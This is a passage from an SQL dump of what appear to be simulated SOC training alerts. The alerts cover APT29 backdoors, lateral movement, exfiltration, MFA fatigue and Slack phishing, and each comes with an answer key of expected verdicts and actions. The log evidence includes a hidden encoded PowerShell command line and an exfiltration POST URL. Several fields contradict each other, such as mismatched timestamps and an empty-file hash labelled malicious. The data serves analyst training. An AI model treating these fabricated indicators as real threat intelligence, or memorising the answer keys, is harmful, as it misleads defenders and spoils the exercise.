ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"user\\\":\\\"jdoe@corp.com\\\",\\\"action\\\":\\\"OAuth Token Request\\\",\\\"service_name\\\":\\\"Company Cloud Service\\\",\\\"token_id\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"token_status\\\":\\\"active\\\",\\\"detected_by\\\":\\\"CASB\\\",\\\"description\\\":\\\"OAuth token request from an external IP associated with known APT activity.\\\",\\\"related_filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(882, 'Persistent Backdoor Installation Detected', 'high', 'Endpoint Detection and Response (EDR)', 'APT29 has installed a backdoor on host 192.168.1.101 using obfuscated techniques to maintain access. This is part of a larger operation to compromise the environment.', 'Persistence', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:34Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.101\",\"attacker_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -nop -w hidden -enc SGVsbG8gd29ybGQ=\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\powershell.exe\",\"username\":\"jdoe\",\"hash\":\"3a1e2f1d2b4c5e6f7a8b9c0d1e2f3a4b\",\"malware_filename\":\"backdoor_ap29.dll\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.5\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known APT29 command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a1e2f1d2b4c5e6f7a8b9c0d1e2f3a4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 backdoor activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_ap29.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Filename used by APT29 for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account compromised for persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(883, 'Unusual Lateral Movement Activity', 'high', 'Network Monitoring Tools', 'Detected lateral movement within the network. Anomalous activity observed from internal host attempting unauthorized access to multiple systems. Indicators suggest potential APT29 involvement leveraging known TTPs.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\",\"user\":\"jdoe\",\"action\":\"login_attempt\",\"status\":\"failed\",\"external_attacker_ip\":\"203.0.113.45\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"APT29_tool.exe\",\"protocol\":\"SMB\",\"message\":\"Anomalous login attempt detected from host 192.168.1.25 to 10.0.0.15; potential lateral movement suspected.\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename resembles known APT29 tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(884, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'APT29 attempts to exfiltrate critical data from compromised systems, targeting government and defense sector intelligence.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"b2f5ff47436671b6e533d8dc3614845d\",\"user\":\"jdoe\",\"exfiltration_method\":\"HTTP POST\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231015-1025\",\"additional_info\":{\"url\":\"http://maliciousdomain.com/upload\",\"protocol\":\"HTTP\",\"bytes_transferred\":10485760}}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT29 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing classified information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2f5ff47436671b6e533d8dc3614845d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with data exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Malware distribution and data exfiltration site used by APT29.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account used for unauthorized data access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:31:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:30:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:29:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:28:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(885, 'Initial Access via MFA Fatigue Attack', 'high', 'MFA logs', 'Lapsus$ initiates the attack by bombarding a contractor\'s MFA with repeated requests, causing fatigue and eventual approval. This technique is aimed at bypassing multi-factor authentication through repeated attempts, leading the target to inadvertently approve access.', 'Credential Access', 'T1110.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:11Z\",\"event_type\":\"MFA Request\",\"user\":\"j.doe@contractor.com\",\"user_role\":\"Contractor\",\"source_ip\":\"45.67.89.101\",\"destination_ip\":\"10.0.5.12\",\"mfa_method\":\"push_notification\",\"request_count\":50,\"final_action\":\"approved\",\"device\":{\"device_id\":\"device123\",\"os\":\"iOS\",\"os_version\":\"14.8\"},\"user_agent\":\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate VPN gateway.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe@contractor.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Current contractor with valid credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(886, 'Execution of Phishing Campaign on Slack', 'high', 'Slack chat logs', 'An advanced phishing campaign was detected on Slack, where attackers used social engineering to send deceptive messages. The goal was to trick employees into divulging sensitive information. An external IP was involved in sending a malicious file, which was shared in a Slack channel.', 'Phishing', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"10.1.12.34\",\"user\":\"j.doe@company.com\",\"channel\":\"#general\",\"message\":\"Please review the attached document for the latest update.\",\"attachment\":{\"filename\":\"Q3_finance_report.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://malicious-site.com/download/Q3_finance_report.pdf\"},\"action_taken\":\"None\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple security vendors.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/download/Q3_finance_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scanner\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing activities.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest 